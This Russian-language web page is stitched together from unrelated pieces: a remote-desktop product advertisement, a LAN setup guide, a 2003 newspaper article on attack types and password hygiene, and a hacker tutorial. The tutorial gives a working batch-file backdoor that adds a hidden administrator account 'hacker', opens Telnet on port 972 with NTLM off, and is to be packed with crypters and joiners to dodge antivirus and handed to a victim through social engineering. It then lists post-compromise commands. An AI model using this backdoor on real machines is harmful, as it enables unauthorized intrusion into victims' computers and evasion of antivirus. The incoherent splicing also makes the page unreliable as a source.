Взлом через командную строку

.

Содержание

Удаленный доступ

RMS — это продукт осуществляющий быстрый и безопасный удаленный доступ к рабочему столу удаленного компьютера. Удаленный компьютер может быть расположен, как в гостиной вашего дома, так и на другом материке.

Удаленное управление рабочим столом

Наиболее часто используемый режим соединения — «Удаленное управление» или «Просмотр». Этот режим позволяет вам видеть удаленный рабочий стол и управлять клавиатурой и мышью удаленного ПК. Благодаря уникальной технологии захвата, RMS — один из самых быстрых продуктов, с удаленным рабочим столом можно работать в режиме реального времени.

Удаленное управление рабочим столом

По центру в верху окна с удаленным экраном расположена всплывающая панель инструментов, которая содержит ряд часто используемых действий: настройка соединения, вызов другого режима, выбор текущего монитора и т.д. Данный режим поддерживает технологию «Drag & Drop» — перетаскивание файлов и папок непосредственно на удаленный рабочий стол и наоборот. Не нужно запускать файловый менеджер, чтобы выполнить простую файловую операцию. Используйте привычное перетаскивание.

Передача файлов

RMS предоставляет весьма продвинутый файловый менеджер, который позволяет получить доступ к файловой системе удаленного компьютера. Режим «Файловый менеджер» выполнен в виде окна, разделенного на две панели по вертикали, интерфейс будет привычен пользователям других известных файловых менеджеров.

Файловый менеджер

  • Поддержка всех базовых файловых операция — копирование, перемещение, удаление и т.д.
  • Встроенная «интеллектуальная докачка» файлов. Эта возможность включена всегда при замене (перезаписи) файлов. При операции замены файлов, будут непосредственно «физически» заменены только не совпадающие части.
  • Режим вкладок позволяет открыть в одном окне файлового менеджера сразу несколько соединения с различными ПК. Возможны файловые операции между удаленными компьютерами, а не только между локальным и удаленным. Вкладки легко упорядочиваются перетаскиванием.
  • Все данные, при передаче, сжимаются и шифруются, для экономии сетевого трафика.
  • Файловый менеджер полностью поддерживает интеграцию «Drag & Drop» (перетаскивание файлов и папок) с другими приложениями и системой.

Список компьютеров и структура сети

Если вы используете RMS для доступа к сотням (или даже тысячам) рабочих станций, группировка соединений в иерархическую структуру — самый удобный способ организации. Вы можете создать структуру, содержащую, к примеру, список городов, в которых есть подразделения вашей организации. В свою очередь, для каждого города можно создать директорию, содержащую список подразделений, находящихся в данном городе. Структура может быть сколь угодно сложной или простой. Если Viewer находится внутри домена (или к нему явно подключен домен) — доступно все дерево Active Directory, т.е. структуру и соединения не нужно создавать вручную.

Active Directory

Еще одной интересной особенностью являются т.н. «эскизы экранов» удаленных компьютеров. Для всех авторизованных соединений (удаленных ПК) отображаются уменьшенные изображение их рабочих столов, которые обновляются через заданный промежуток времени. Размер и частоту обновления этих эскизов можно менять. Также, если навести указатель мыши на такой эскиз и задержать его на несколько секунд, появится всплывающее окно с увеличенной копией данного эскиза.

Командная строка cmd, почувствуй себя хакером.

Сопровождаемые и не сопровождаемые ПК

Сопровождаемый компьютер — это ПК, за которым работает оператор. Например, компьютер бухгалтера, дизайнера, менеджера. Не сопровождаемый компьютер — это ПК, за которым, соответственно, нет оператора. Обычно это различного рода сервера — веб-сервер, файловый сервер, контроллер домена и т.д. RMS хорошо подходит, как для администрирования сопровождаемых ПК, так и не сопровождаемых. По умолчанию RMS Host предоставляет полный контроль над удаленным компьютером. Вы можете контролировать экран, клавиатуру, мышь, файлы, процессы, службы, питание и многое другое без каких-либо ограничений. Компьютер можно даже перезагрузить в безопасном режиме. Настройки Хоста можно защитить паролем от изменений. Это все удобно для администрирование не сопровождаемых ПК. Однако, если за компьютером работает живой пользователь, такой подход не всегда годится. Пользователя может не устраивать тот факт, что к его ПК можно подключится в любой момент без предупреждения. На этот случай Хост можно настроить таким образом, чтобы, при попытке авторизации удаленного администратора, запрашивалось разрешение на доступ у пользователя, который работает за компьютером. Также можно ограничить список режимов соединения. Например, запретить доступ к файловой системе. Для администрирования пользователей вне организации или же оказания удаленной поддержки есть специальный модуль — Агент. Это специальная версия Хоста, которую можно запускать без установки и прав администратора. Удаленный пользователь в любой момент может прекратить сеанс, просто закрыв программу.

Подтверждение соединения

Когда данная функция включена, программа показывает удаленному пользователю сообщение с запросом на доступ к данному удаленному ПК. Удаленный пользователь может принять или отвергнуть запрос на соединение. В настройках можно указать промежуток времени, через который запрос будет автоматически отвергнут или принят, также можно запретить отображение запроса, если в момент соединения с удаленным ПК не работает интерактивный пользователь.

Подтверждение соединения

Данная функция удобна для различных служб поддержки. Незнакомый клиент может чувствовать себя некомфортно, зная, что к его компьютеру без спроса может кто-то подключиться.

Работа при сложной топологии сети

RMS — это весьма гибкая утилита для удаленного администрирования, которая может работать в самых различных сетях, со сложной топологией и структурой. Внутри корпоративной или локальной сети обычно все просто. В настройках соединения указывается IP адрес или DNS имя нужного ПК и готово — можно соединяться. Но что делать, если удаленный компьютер закрыт сетевым экраном или NAT? На помощь приходит наша технология Internet-ID. На удаленном Хосте можно, буквально двумя щелчками мыши, получить уникальный ID, который будет затем на постоянной основе привязан к данному Хосту. Затем указать этот ID в настройках соединения на стороне администратора. Все — можно работать. Это не намного сложнее, чем соединение по IP адресу, однако позволяет легко решать многие рутинные проблемы системного администрирования, и обходиться без «проброса портов» и прочих приемов. Также доступно т.н. «каскадное» соединение (соединение через другой Хост) и обратное соединение (более старая и менее удобная версия Internet-ID).

Данные режимы соединения заинтересуют продвинутых специалистов в области построения сетей.

Гибкая настройка прав доступа

RMS предоставляет возможность разграничивать права удаленного доступа к удаленному компьютеру по режимам и пользователям.

Система безопасности RMS

Помимо встроенной системы учетных записей RMS, поддерживается также система разграничения прав для Windows пользователей, при авторизации на основе NTLM. Это особенно полезно в доменных сетях.

Система безопасности NTLM

Блокировка экрана и устройств ввода

Функция блокировки устройств ввода (клавиатура, мышь) является обязательной для любого современного программного обеспечения для удаленного доступа.

Данная функция позволяет заблокировать клавиатуру и мышь удаленного компьютера таким образом, чтобы удаленный пользователь не мешал специалисту поддержки работать с удаленным компьютером.

Блокировка экрана и устройств ввода

Функция блокировки экрана позволяет скрыть экран удаленного компьютера от пользователя, который находится непосредственно у его монитора. Дополнительно можно выбрать изображение, надпись или веб-страницу, которая будет отображаться на удаленном мониторе на время блокировки. Вы можете настроить блокировку устройств ввода и экрана, как перед установкой соединения, так и во время работы с удаленным рабочим столом.

Работа с несколькими компьютерами одновременно

RMS поддерживает неограниченное количество одновременно работающих подключений к рабочим столам удаленных компьютеров.

  • Клиент (Viewer) может работать с несколькими удаленными Хостами одновременно (удобный интерфейс на основе «вкладок» облегчает эту задачу).
  • Хост (Host) может принимать соединения от нескольких Клиентов одновременно. Например, несколько администраторов могут подключиться к одному и тому же Хосту.
  • Одновременное подключение поддерживают все режимы соединений.

Настройка качества картинки и экономичный режим

При работе внутри локальной или быстрой сети, эти настройки можно не менять — программа будет работать в режиме реального времени. Однако, если канал соединения узкий, то имеет смысл уменьшить количество цветов, передаваемой по сети картинки, а также включить т.н. «экономичный режим». В медленной сети рекомендуется выбрать 256 битный цвет и включить экономичный режим. Также можно ограничить FPS. Это позволит весьма комфортно осуществлять удаленный доступ даже через GPRS.

Удаленная печать

Данная функция позволяет распечатывать документы удаленного компьютера на локальном принтере. Если раньше для этого необходимо было скопировать сам документ на локальный компьютер, затем открыть его в приложении, которое поддерживает данный тип документа, и только потом распечатать, то теперь все намного проще.

Удаленная печать

Больше нет необходимости устанавливать нужное приложение на локальный компьютер и копировать файлы (тем более, что это далеко не всегда возможно).

Вы можете распечатать документ удаленно, на специальном виртуальном принтере RMS. Данные будут автоматически переданы на локальный компьютер (Viewer), и вы сможете их распечатать на любом доступном принтере.

Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет? Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет…Всем привет! Все больше и больше я вижу, как новички задают одни и те же вопросы на форуме, в чате, в аськах, такие как: Что такое телнет?

Управляем сервером Windows из командной строки

Как им пользоваться? Зачем он нужен? Поэтому я решил в помощь им написать эту статью. В этой статье я попробую объяснить как с помощью такого универсального сервиса, как телнет, можно проникнуть в файловую систему удалённого по сети компа, и полностью управлять им, отдавая команды. Но прежде чем действовать давайте узнаем, что за такая служба телнет.

Телнет — сетевой протокол для работы в удаленной системе в терминальном
режиме(т.е. режиме командной строки). Все делается \»ручками\», мыши отдыхают,только текстовый обмен информацией. Он один из важнейших средств, пользоваться которым должен научиться каждый хакер прежде, чем он подумает о взломе серверов. Этот протокол может быть использован для подключения к удаленным компьютерам и запуска программ из командной строки, просто вводя команды в GUI окне. Telnet не использует ресурсы клиентской машины, но он использует ресурсы сервера, с которым соединился клиент. В основном это программа, эмулирующая терминал,
позволяющая нам подключаться к удаленным компьютерам.

Ну а теперь как вы уже наверно догадались эту службу и необходимо открывать у
жертвы. Бывает такое, что этот сервис уже будет весить у \»врага\», но при попытки
подключится 90% того, что он потребует пасс, можно конечно попробовать брутить,
но вероятность успеха очень маленькая. Для взлома можно воспользоваться таким
методом как социальная инженерия(СИ). Я думаю не надо объяснять что это такое.
Если вы думаете, что СИ никак не относится к хакерству то вы ошибаетесь, этот
метод в данном случае наиболее актуален.
Для того, чтобы открыть телнет, жертве необходимо будет запустить созданый
тобой файл, который ей можно подарить. При запуске его он пропишит нужный тебе
порт, на котором будет висеть телнет, нужный логин и пасс. Его можно запросто
написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной
строки).
тело батника:

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

все это пишешь в блокноте, и сохраняем как *.bat

Теперь пояснения:
chcp 1251- меняет кодировку на 1251, так как батник написан не в дос кодировке.
net user SUPPORT_388945a0 /delete и
net localgroup Пользователи SUPPORT_388945a0 /del — удаляют стандартную
первоначальную виндосовскую учетку, которая есть в xp prof и в 2003 server.
net user hacker hack /add и
net localgroup Администраторы hacker /add — не трудно догадаться, что этими
командами создаётся новая учетная запись с админскими правами,
где логин: hacker
пасс: hack
Так как при создании нового админа он будет виден в welcome screen\’е, отключить его
можно импортировав
рег файл в реестр, следующего содержания:
Содержимое conf.re
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
\»hacker\»=dword:00000000
Сервис телнет по умолчанию отключен, но есть такая команда sc config tlntsvr start=
auto которая
меняет тип его запуска на автоматический(по дефолту disabled ).
При запуске телнета, он ставится на стандартный свой 23-ий порт, но увы это
палевно, поэтому советую прописывать этой командой tlntadmn config port=972
sec=-NTLM , редко используемый порт. В нашем случае это 972.
Ну вот все настройки и конфигурация сервиса завершена, и эта строка net start Telnet
окончательно запустит наш бэкдор.

теперь проверим правильный ли синтаксис кода. Открываем командную строку, если
она потерялась можно найти её здесь c:WINDOWSsystem32cmd.exe. Вставляем код,
запускаем и смотрим нет ли ошибок. Убедится что все ок, еще можно так:
Пуск -> Выполнить -> пишем services.msc -> Ok
Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и
смотришь её свойства. При необходимости в любой момент можно её отключить.

Вот батник готов, и как ты видишь он слишком палевны, при его запуске вылетает
консольное черное окно, говорящее о выполняемых процессах в командной строке. Но
не все так плохо, тебе поможет такая прога, как QuickBatchFileCompiler http://ifolder.ru/7197807. Она
компилирует пакетные bat-, cmd- и vb-файлы в исполняемые *.exe. И батник
превратится в скрытый *.exe файл, ну скрытый конечно не в прямом смысле.
Вроде готово… Но не совсем, ты же не будешь дарить пустой экзешник, поэтому
бери в руки джойнеры и крипторы, если нету, не плохой публичный криптор можно
скачать тут http://ifolder.ru/7198272 pohernah107(13 кб) а джойнер можешь взять здесь http://ifolder.ru/7197872
RedBindeR_v1.3_Mod(460 кб) . Они помогут тебе склеить файлы в один и изменить
сигнатуру дабы не палится антивирусами.
Допустим, жертва повелась на эти уловки и запустила файл. Зная IP своей жертвы
тебе осталось только подключится к телнету через указанный тобой порт. Бывает
так что жертва находится в глобальной сети www у которой IP динамический, в этом
случаи, зная диапазон IP его провайдера можно просканировать эту сеть на
открытый наш редко используемый 972 Порт. А чтобы знать когда твой \»друг\»
в онлайне, может помочь его авторизованная ася, или всем известный мэйл@агент.
Осталось подключится. Для этого можешь выбрать стандартный виндосовский
клиент который находится тут c:WINDOWSsystem32telnet.exe.
Запускаешь. Пишешь:
Microsoft Telnet> o 192.168.1.24[IP жертвы] 972[порт]
если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё акей =))
Вводишь:
login: hacker
password: hack
Появляется надпись:
*=====================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*=====================================================
C:>_

Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять кампом, отдавая команды…
Можно к примеру расшарить диски:

C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul

перезагрузить комп:
C:>shutdown -r -t 1 -c -f

прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /f — который запретит доступ к нему

или поднять ftp сервер и залить радмина для более удобного удаленного
администрирования:
C:>ftp
В общем-то, здесь уже играет фантазия взломщика =)

Как видишь, такую службу как Telnet нельзя недооценивать, в опытных руках хакера это мощное оружие, способное привести к несанкционированному доступу к дорогой в наше время информации. Поэтому делай выводы, чтобы защитить себя в информационном мире.

P.S. На все непонятные термины и выражения есть Гугл.

Внимание!!! Данная статья — это не побуждение к действию, все описанное здесь
попадает под действие УК РФ. Я пишу это только для ознакомления, и в целях вашей
информационной безопасности

Для обмена данными между устройствами можно использоваться сменные накопители информации, но гораздо более удобно использование локальной вычислительной сети (ЛВС). ЛВС или в английском варианте LAN (local area network) — эта такая компьютерная сеть, в которой для обмена информацией объединено небольшое количество компьютеров или устройств. Существует множество способов, как подключить локалку, но самым распространенным является соединение по типу «звезда» или Ethernet. Устройства могут соединяться по проводам или с использованием беспроводных технологий.

Подготовительный этап и необходимое оборудование

При создании ЛВС используется следующее оборудование:

  • сетевая карта, которая может быть встроена или в виде отдельного модуля;
  • патчкорд — обжатый кабель с коннектором RJ-45;
  • маршрутизатор (роутер) или свитч (коммутатор).

Если свичи или роутеры не использовать, то в таком случае одновременно можно связать только два устройства, в то время как их использование уже ограничивается только количеством этих свитчей или маршрутизаторов и портов на них.

Кабель, который используется, должен быть специальным образом обжат, при чем обжимки для соединения двух PC или же для подключения к маршрутизатору отличаются. Это так называемая прямая и обратная обжимки. Порядок проводков для того, как подключить компьютер к локальной сети в случае соединения «компьютер-компьютер» или кабель crosower (обратный), с одной стороны патчкорда:

  1. бело-оранжевый;
  2. оранжевый;
  3. бело-зеленый;
  4. синий;
  5. бело-синий;
  6. зеленый;
  7. бело-коричневый;
  8. коричневый.

С другой стороны, порядок по цветам следующий:

  1. бело-зеленый;
  2. зеленый;
  3. бело-оранжевый;
  4. синий;
  5. бело-синий;
  6. оранжевый;
  7. бело-коричневый;
  8. коричневый.

Для доступа по типу «компьютер-роутер» на обоих концах кабеля используется обжимка по любому из способов. Главное, чтобы провода были зажаты в одинаковой последовательности. Если сделать провод самостоятельно нет возможности, его можно купить в любом компьютерном магазине.

Теперь стоит рассмотреть адреса, которые будут присвоены аппаратам в будущей сети. Существует соглашение, в котором диапазон адресов для глобальной и для LAN отличаются. В локальных используются следующие диапазоны:

  • 0.0.0 — 10.255.255.255;
  • 16.0.0 — 172.31.255.255;
  • 168.0.0 — 192.168.255.255.

Какой из указанных диапазонов использовать решает администратор самостоятельно. Это не имеет принципиального значения. Для домашнего использования обычно берется диапазон 192.168.Х.Х, для корпоративных обычно это 10.Х.Х.Х, и пр.

Создание проводного соединения

Когда кабель подготовлен и администратор определился с сетевыми адресами, нужно подключить его физически в разъемы сетевых карт. Правильно сделанный кабель при подключении покажет индикацию на карте. Светодиод желтого цвета сигнализирует о том, что линк (соединение) присутствует, а зеленый — активность соединения. Если линк есть, можно приступать непосредственно к настройке.

Для начала убедимся, что компьютеры имеют различные имена и принадлежат одной и той же рабочей группе. Чтобы узнать или указать эту информацию делаем следующие шаги:

  • на рабочем столе или в меню «Пуск» правой кнопкой вызвать свойства на иконке «Мой компьютер»;
  • на вкладке имя компьютера эта информация присутствует;
  • убедиться, что имена отличаются, а рабочая группа одинаковая на обоих PC;
  • при необходимости изменить имя кнопкой «Изменить…», а рабочую группу кнопкой «Идентификация»;
  • изменения будут применены после перезагрузки ПК.

При создании подключения «компьютер-компьютер» и под управлением ОС Windows XP это делается так:

  • вызвать «Пуск — Настройка — Сетевые подключения»;
  • в открывшемся окне выбрать свойства сетевого соединения правой кнопкой;
  • выбрать «Протокол интернета» и нажать «Свойства»;
  • выставить переключатель в положение «Использовать следующий IP адрес» и ввести адрес из выбранного диапазона. Маска будет проставлена автоматически и менять ее не нужно;
  • Подтвердить действия нажав «Ок».

В ОС Windows Vista/7/8/8.1/10 делается следующим образом:

  • вызвать «Панель управления»;
  • перейти в «просмотр состояния сети»;
  • слева нажать на ссылку «Дополнительные параметры адаптера»;
  • вызвать окно свойств адаптера и далее «Протокол интернета версии 4»;
  • можно снять галочку напротив «Протокол интернета версии 6»
  • прописать айпишник и подтвердить действия.

При подключении двух компьютеров адрес шлюза не прописывается, т.е. поле оставляется пустым. После выполнения настроек на одном компьютере, точно такие же действия выполняются и на втором. Единственное отличие будет в том, что последнее значение в поле IP адреса должно отличаться. Последняя цифра в IP не должна быть 0 и 255, т.к. эти адреса зарезервированы под broadcast (широковещательный диапазон).

Для того как подключить 3 компьютера по локальной сети нужно уже использовать маршрутизатор или коммутатор. В качестве адреса шлюза указывается IP-адрес маршрутизатора. При использовании свитча шлюза также не будет. Все программные настройки прописываются аналогичным образом. Единственное отличие — это использовать нужно кабель с прямым способом обжимки.

Проверка работоспособности сети и настройка доступа

Проверка связи заключается в том, чтобы убедиться в прохождении пакетов между компьютерами. Это делается запуском команды ping, и в простонародье называется «попинговать сеть». Выполняется она очень просто в командной строке прописывается «ping <IP адрес устройства>».

Если приходят положительные ответы, то можно считать, что сеть сконфигурирована правильно и компьютеры обмениваются информацией.

Управляем сервером Windows из командной строки

Для более комфортной работы имеет смысл открыть общий доступ к определенным папкам, чтобы пользователи разных ПК могли просматривать файлы в них или изменять их. Что для этого нужно? Несколько простых шагов для Виндовс XP:

  • правой кнопкой вызвать свойства папки, доступ к которой нужно открыть;
  • в свойствах переходим на вкладку «Доступ»;
  • поставить галочки напротив «Открыть общий доступ к этой папке»;
  • при необходимости изменить сетевое имя ресурса;
  • если требуется, чтобы пользователи сети имели право изменять файлы, проставляем галочку в «Разрешить, изменение файлов по сети».

В более поздних версиях Виндовс действия немного отличаются:

  • также вызываются свойства папки и вкладка дополнительно;
  • нажать «Общий доступ…»;
  • из выпадающего списка «Добавить» выбирается конкретный пользователь или «Все», а для уровня разрешений требуемые доступы, например, чтение и запись;
  • нажимаем кнопки «Общий доступ», затем «Готово»;

В центре управления сетями изменяются параметры активной сети следующим образом:

  • нажать на ссылку «Изменить параметры общего доступа»;
  • выбрать сетевое обнаружение ресурсов компьютера;
  • разрешить общий доступ к файлам и принтерам;
  • включается доступ сетевых пользователей сети;
  • также выключается доступ по паролю пользователя.

Чтобы использовать сетевые ресурсы, следует выполнить поиск доступных сетевых ресурсов в рабочей группе, через обычный проводник. Есть возможность работать с общей папкой как с отдельным диском, если подключить как «Сетевой диск».

Если остались вопросы о других способах организации подключения, или как подключить локальную сеть на ноутбуке, то есть еще один очень популярный способ — создание беспроводной ЛВС, чтобы пользователи подключались через WiFi адаптер, но реализация этого способа выходит за рамки данной статьи.

Компьютер-Информ || Архив || Рубрики || Поиск || Подписка || Работа || О "КИ" || Карта


Информационная безопасность

Хакеры: технология взлома компьютерной сети


Виды атак и их последствия

(Продолжение. Начало см. КИ 22)

Игорь Бойцов, igor_boytsov@ci.ru

В предыдущей статье мы рассмотрели технические аспекты выполнения некоторых видов атак. Теперь дадим классификацию по типам атак и опишем, что может злоумышленник в случае удачного проведения взлома.

Переполнение буфера это уязвимость, появляющаяся в результате некачественного программирования.

Простейшие способы взлома.(Начинающим)

Ошибка переполнения буфера происходит, когда переменная, переданная функции в качестве аргумента, копируется в буфер без проверки размера. Если размер переменной больше буфера, происходит переполнение. Чтобы использовать данную уязвимость, в переменную посылают фрагмент программы. Если злоумышленнику удается выполнить переполнение буфера, он может удаленно выполнять команды на машине-жертве с правами атакованного приложения.
Это означает, что хакер может украсть какие-либо конфиденциальные данные, изменить содержимое вашей машины, уничтожить какую-либо информацию. Самое невинное провести дефейс, т. е. заменить, например, титульную страницу сайта. Чтобы яснее обрисовать серьезность последствий, приведем один пример.
Дьябло (Diablo) из румынской хакерской группы Pentaguard утверждает: Если вы проникаете на сервер и меняете там главную страницу, никто не страдает. Администратор смущен, и это все. Группа Pentaguard исковеркала более сотни сайтов, по большей части связанных с правительством и армией. Дьябло поясняет: Я никогда не удаляю, не ворую данные и не обрушиваю систему. Это, может быть, и правда, но Джону Симабуку, менеджеру пострадавшего от Pentaguard сайта законодательного собрания штата Гавайи, пришлось заплатить $4000 за несколько новых дисков большого объема, поскольку те диски, на которых побывали хакеры, полиция конфисковала как вещественное доказательство. Ктому же, целую неделю, пока не пришли новые диски, сайт не работал. В какой-то степени это актуально и для нашей страны.

Скрипты, на которых строится сайт и система в целом. Низкокачественное написание скриптов часто влияет на безопасность системы в целом. Существуют возможности использования уязвимостей в Perl-скриптах для доступа к файлам в пределах файловой системы Web-сервера или выполнения несанкционированных команд.
Это также грозит потерей информации и предоставляет хакеру возможность ее несанкционированного копирования, изменения или удаления. Заметим, что использование дыр в скриптах самый распространенный для новичков способ взлома сайтов и кражи конфиденциальных данных.

Атаки типа DoS (отказ в обслуживании) имеют множество неприятных эффектов. Среди них перегрузка линий связи в локальной сети, подвешивание целевой машины, невозможность реагировать на запросы извне. Основной вред, приносимый такими атаками паралич в работе сети, и, как следствие, остановка любой работы, связанной с обменом данными внутри сети.

Целью атаки перехват трафика и является, собственно, перенаправление трафика между двумя машинами. Это нужно для перехвата, модификации или уничтожения данных, которыми обмениваются системы. Существует множество типов атак, реализующих этот принцип, например, с использованием подмены DNS для перенаправления трафика между Web-сервером и клиентом. Также недавно созданы программы для перенаправления SSH-трафика.
Эта атака скорее концептуальная, нежели практическая, так как отделить данные от командной информации, а затем собрать разрозненные пакеты воедино очень сложно. Атака проводится только в том случае, если злоумышленник точно знает, какого рода данные (например, номера кредитных карт) вы будете пересылать.

Базовые правила компьютерной безопасности

Про пароли

Первое, чего мы коснемся, это пресловутые пароли. Несмотря на все достижения в технологиях безопасности, один аспект остается неизменным: пароли все еще играют центральную роль в безопасности системы. Проблема заключается в том, что они слишком часто могут служить простейшим механизмом для взлома. Здесь первое, что следует учесть, это то, что хакеры могут получить пароли, в основном, скачивая с вашего винчестера стандартные файлы, содержащие пароли, и скрипты, в которых они хранятся. Выход из этого положения очень прост: необходимо запретить сохранение пароля в стандартном файле Windows. Чтобы не вводить логин и пароль каждый раз заново, необходимо написать и подключить простейший скрипт, который будет хранить в себе ваши данные. Но скрипт сохранить не на жестком диске, а на дискете. То есть, дискета станет вашим ключом к сети. После того, как подключение и авторизация прошли успешно, можно вытащить дискетку из дисковода, и теперь никто не сможет как-либо получить ваши данные.
Несколько советов касатель-но выбора паролей. При попытке проникновения в систему,
хакер может попытаться подобрать (угадать) пароль. Исходя из этого, не рекомендуется в
качестве пароля использовать следующие слова и их комбинации: admin, ann, anon, anonymous/anonymous, backup, batch, bin, checkfsys, daemon, demo, diag, field, ftp, games, guest/guest, guest/anonymous, help, install, listen, lp, lpadmin, maint, makefsys, mountfsys, network, news, nobody, nuucp, nuucpa, operator, powerdown, printer, pub, public, reboot,
rje, rlogin, root, sa, setup, shutdown, startup, sync, sys/sys, sysadm, sysadmin, sysbin/sysbin, sysbin/bin, sysman, system,
tech, test, trouble, tty, umountfsys, user/user, user1/user1, uucp, uucpa, visitor.

Плохой пароль это:
• Собственное имя;
• Слово, которое есть в словаре;
• Идентификатор, присвоенный вам какой-нибудь системой или любые его вариации;
• Дата рождения;
• Повторенный символ (например, AAA);
• Пароль меньше 6 символов;
• Пароль, установленный вам чужим человеком;
• Пароль, состоящий из символов, соседствующих на клавиатуре (например, QWERTY или ЙЦУКЕ);
• Пароль, состоящий из паспортных данных персональный номер, номер водительских прав и т. д.

Хороший пароль это:
• Бессмысленная фраза;
• Случайный набор символов вперемешку с буквами и цифрами.

И последний совет: меняйте пароли хотя бы раз в месяц.

Про коней

Зачастую данные могут быть украдены с использованием троянского коня специального ПО, действие которого заключается в поиске на вашем компьютере определенных данных и отправки их хозяину. Обычно такие программы распространяются через e-mail под видом рекламы или под другим благовидным предлогом. Что-нибудь типа: Запустите приложенную программу, и вы узнаете, как получить бесплатный пылесос!. Запустив приложение, вы можете собственноручно впустить к себе троянского коня. Он покопается в ваших файлах (на это у него уйдут доли секунды), вполне вероятно, что найдет ваши логин и пароль и отправит их своему хозяину для дальнейшего нелегального пользования. Как уберечься от троянских коней:
• Не запускайте программы сомнительного происхождения, которые прислали вам через Интернет без вашего на то предварительного согласия. Иными словами, не запускайте программу, если не знаете наверняка, что она делает.
• Троянца можно получить не только через почту.

Бывает, что его распространяют через Web или FTP под видом тех или иных полезных мелочей (русификатора, например). Используйте их крайне осторожно, предварительно проверив антивирусом.
• Принцип работы троянца чаще всего заключается в поиске пароля и логина в файле реестра Windows. В связи с этим (повторимся) не рекомендуем пользоваться опцией Запомнить пароль в программе удаленного доступа.
• Если для авторизации вы пользуетесь скриптом, то лучше поместить его в нестандартном месте. По умолчанию скрипты хранятся (для ОС Windows) в папке \Program Files\Accessories\. Совершенно точно известно, что как минимум один троянец приучен выкачивать все скрипты из этой директории.
• В остальном руководствуйтесь общими принципами защиты от компьютерных вирусов, разновидностью которых троянцы являются.

Про заплатки, шифрование и старые компьютеры

Проблема: уязвимость Win-dows. Хакеры часто проникают в компьютеры через отлично документированные бреши (да, они тоже читают предупреждения о безопасности). Это происходит, когда пользователи не устанавливают заплаты (модули корректировки).
Решение: устанавливать заплаты. Сайт Microsoft Critical Update Notification (www.microsoft.com) сообщит вам о появлении свежих модулей. Обязательно скачивайте и инсталлируйте их.

Проблема: незащищенные компьютеры. Хакеры часто входят в сети через старые компьютеры, которыми никто не пользуется. Такое случается, когда администратор забывает отсоединить машину уволившегося сотрудника от модема или сети. На старой машине с меньшей вероятностью окажутся установлены все новейшие заплаты. А терминал, которым пользуются несколько человек и который не закреплен за кем-либо одним, при обновлении систем, связанном с безопасностью, легко забыть. Любая рабочая станция, оставленная включенной и подсоединенная одновременно к модему и к локальной сети, даст хакеру возможность дозвониться на машину, пройти брандмауэр и получить доступ к сети.
Решение: обезопасьте старые компьютеры. Проведите инвентаризацию всех машин и отключайте от сети те из них, за которыми уже никто не работает. Если компьютер, подсоединенный к сети, используется несколькими людьми, проверьте, чтобы на нем были выполнены те же обновления, что и на всех остальных.

Проблема: слабое шифрование. На сервере важные данные шифруются, а вот при удаленном резервном копировании нет. Хакеры могут нацелиться на данные, находящиеся на менее защищенной удаленной машине, где хранятся резервные копии.
Решение: шифровать данные. Шифровать их везде, где они хранятся, включая жесткие диски ПК.

Наиболее известные в хакерской среде личности


Эрик Скуг
Eric Skoog
Deth Vegetable aka Deth Veggie

Известен своим участием в работе Cult of the Dead Cow.
Также известен как человек, одним из первых поместивший в Интернет
инструкции по изготовлению бомб в домашних условиях.

 

 


Sir Dystic

Автор легендарной утилиты удаленного управления компьютером Back Orifice,
глава известной хакерской группы Cult of the Dead Cow.
Настоящее имя неизвестно.

 

 

 


Федор
Fyodor

Автор утилиты nmap (www.insecure.org), самого популярного хакерского пакета в мире.
Невероятную рекламу и без того уже известному сканеру портов сделали братья Вачовски,
показавшие несколько почти реальных скриншотов nmap в Matrix Reloaded.
Fyodor единственный человек в данном списке, по которому в сети практически отсутствует какая-либо информация.

 

 

 


Питер Шипли
Peter Shipley

Автор первого сетевого сканера NetSweep (1988).
Является автором многочисленных публикаций, посвященных сетевой безопасности,
и обладателем патента на Интеллектуальное устройство для защиты локальных сетей.
Ныне является экспертом по технической безопасности компании Omega Engineering,
а также состоит в хакерской группе 10pht.

 


Джефф Мосс
Jeff Moss

Основатель DefCon (www.defcon.org), хакерской конференции
по компьютерной безопасности, а также конференции Black Hat Briefings.
Кроме того, Мосс является экспертом по компьютерной безопасности компании Blackhat.
Имеет ученую степень в области уголовного права, полученную в Университете Гонзага.

 

 


Эрик Корли
Eric Corley

Известен тем, что опубликовал на своем Интернет-сайте исходные коды ПО для взлома защитного кода
DVD-дисков.

Эта программа, написанная группой европейских программистов и известная под названием
Decode Content Scrambling System (DeCSS), позволяет обходить защиту DVD-дисков и создает возможность
для беспрепятственного копирования фильмов и размещения их в Интернет.
Ныне является главным редактором хакерского журнала 2600: The Hacker Quarterly.

 

 


      КОМПЬЮТЕР-ИНФОРМ 
          Главная страница || Статьи 1’2003 (20 января — 2 февраля) || Новости СПб || Новости России || Новости мира

Рубрики || Работа || Услуги || Поиск || Архив || Дни рождения
О "КИ" || График выхода || Карта сайта || Подписка

Рассылка анонсов газеты по электронной почте

Главная страница

Сайт газеты "Компьютер-Информ" является зарегистрированным электронным СМИ.
Свидетельство Эл 77-4461 от 2 апреля 2001 г.
Перепечатка материалов без письменного согласия редакции запрещена.
При использовании материалов газеты в Интернет гиперссылка обязательна.

Телефон редакции (812) 718-6666, 718-6555.
Адрес: 196084, СПб, ул.Заставская, д.23, БЦ «Авиатор», 3-й этаж, офис 307
e-mail: editor@ci.ru
